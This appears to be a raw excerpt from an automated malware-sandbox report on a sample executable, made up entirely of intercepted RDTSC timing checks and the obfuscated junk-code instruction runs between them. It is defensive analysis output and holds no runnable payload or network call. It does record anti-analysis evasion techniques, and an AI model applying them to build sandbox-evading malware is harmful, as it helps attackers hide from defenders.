Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170719C second address: 17071A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707454 second address: 170745F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007FEA75199F66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17079F1 second address: 17079F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17079F7 second address: 17079FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17079FC second address: 1707A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707A06 second address: 1707A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707A0A second address: 1707A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEA75194B56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707B5D second address: 1707B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707B62 second address: 1707B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707E56 second address: 1707E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FEA75199F66h 0x00000009 jmp 00007FEA75199F75h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707E7E second address: 1707E9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FEA75194B46h 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707E9C second address: 1707EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707EA0 second address: 1707EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17080FB second address: 17080FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170825F second address: 1708265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170876B second address: 170877A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170891A second address: 1708920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1708920 second address: 1708939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1708A88 second address: 1708A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1708ED2 second address: 1708ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1708ED6 second address: 1708EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170AD5B second address: 170AD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170AD5F second address: 170AD8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75194B56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170BDB8 second address: 170BDC2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA75199F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170BF62 second address: 170BF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170D099 second address: 170D0AD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA75199F66h 0x00000008 jp 00007FEA75199F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170D0AD second address: 170D0B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170D0B3 second address: 170D0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170D0B9 second address: 170D0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170E779 second address: 170E77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170E77D second address: 170E783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1712A0F second address: 1712A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17165AC second address: 17165BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007FEA75194B48h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1716D31 second address: 1716D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F77h 0x00000008 jnl 00007FEA75199F66h 0x0000000e jns 00007FEA75199F66h 0x00000014 popad 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1716EDF second address: 1716EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1716EE3 second address: 1716EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1717EFF second address: 1717F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1717F13 second address: 1717F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1717F24 second address: 1717F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1717F29 second address: 1717F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1718075 second address: 1718079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1718079 second address: 171807F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171807F second address: 1718084 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171821B second address: 1718232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F73h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1718232 second address: 171824A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FEA75194B54h 0x0000000f pushad 0x00000010 jl 00007FEA75194B46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17184DD second address: 17184EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Ah 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17184EF second address: 171850F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEA75194B57h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171850F second address: 1718519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1718E26 second address: 1718E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1718E90 second address: 1718EB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA75199F73h 0x0000000b popad 0x0000000c push eax 0x0000000d jnl 00007FEA75199F6Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1719180 second address: 1719184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1719184 second address: 1719199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1719199 second address: 17191A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75194B4Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1719690 second address: 1719694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171A073 second address: 171A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171A07D second address: 171A081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171A081 second address: 171A090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171BD5A second address: 171BD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171BD60 second address: 171BD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171BD64 second address: 171BD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171C89D second address: 171C8AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FEA75194B46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171C64B second address: 171C651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171C651 second address: 171C657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171C8AF second address: 171C94B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FEA75199F68h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+1244DF1Fh], ecx 0x0000002b push 00000000h 0x0000002d or di, 93F2h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FEA75199F68h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov esi, dword ptr [ebp+122D24F1h] 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 jmp 00007FEA75199F6Dh 0x0000005b ja 00007FEA75199F68h 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FEA75199F6Fh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171C657 second address: 171C65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171D125 second address: 171D12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171D3D9 second address: 171D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171D3DD second address: 171D3F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA75199F6Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171D3F5 second address: 171D3FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171D3FF second address: 171D409 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA75199F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171DD43 second address: 171DD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171DD47 second address: 171DD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171F99D second address: 171F9AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 171FFED second address: 1720055 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA75199F68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FEA75199F6Bh 0x00000010 nop 0x00000011 jbe 00007FEA75199F6Ch 0x00000017 mov dword ptr [ebp+122D3611h], edi 0x0000001d push 00000000h 0x0000001f cmc 0x00000020 push 00000000h 0x00000022 and esi, dword ptr [ebp+122D353Fh] 0x00000028 add dword ptr [ebp+122D1851h], ecx 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FEA75199F77h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jg 00007FEA75199F77h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1720814 second address: 1720818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1725435 second address: 172544B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F72h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172544B second address: 1725496 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c movzx eax, cx 0x0000000f jnp 00007FEA75194B4Ch 0x00000015 popad 0x00000016 push 00000000h 0x00000018 mov ebx, 7A0A39C3h 0x0000001d push 00000000h 0x0000001f or di, CAECh 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 jmp 00007FEA75194B53h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FEA75194B46h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17263A3 second address: 17263BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172659F second address: 17265A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1729496 second address: 172949C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172949C second address: 17294A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FEA75194B46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 17294A9 second address: 172951F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FEA75199F74h 0x00000011 popad 0x00000012 pop esi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FEA75199F68h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D186Fh], edi 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D2A90h], ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007FEA75199F79h 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172951F second address: 1729525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1729525 second address: 1729529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172A5B0 second address: 172A5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172A5B6 second address: 172A5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172A5BA second address: 172A5DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FEA75194B56h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172B59F second address: 172B5AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172B5AD second address: 172B5B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 172B5B2 second address: 172B64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FEA75199F68h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 call 00007FEA75199F78h 0x0000002e mov bl, EAh 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 jmp 00007FEA75199F72h 0x00000038 push 00000000h 0x0000003a jmp 00007FEA75199F77h 0x0000003f xchg eax, esi 0x00000040 jmp 00007FEA75199F6Dh 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jl 00007FEA75199F66h 0x00000050 rdtsc
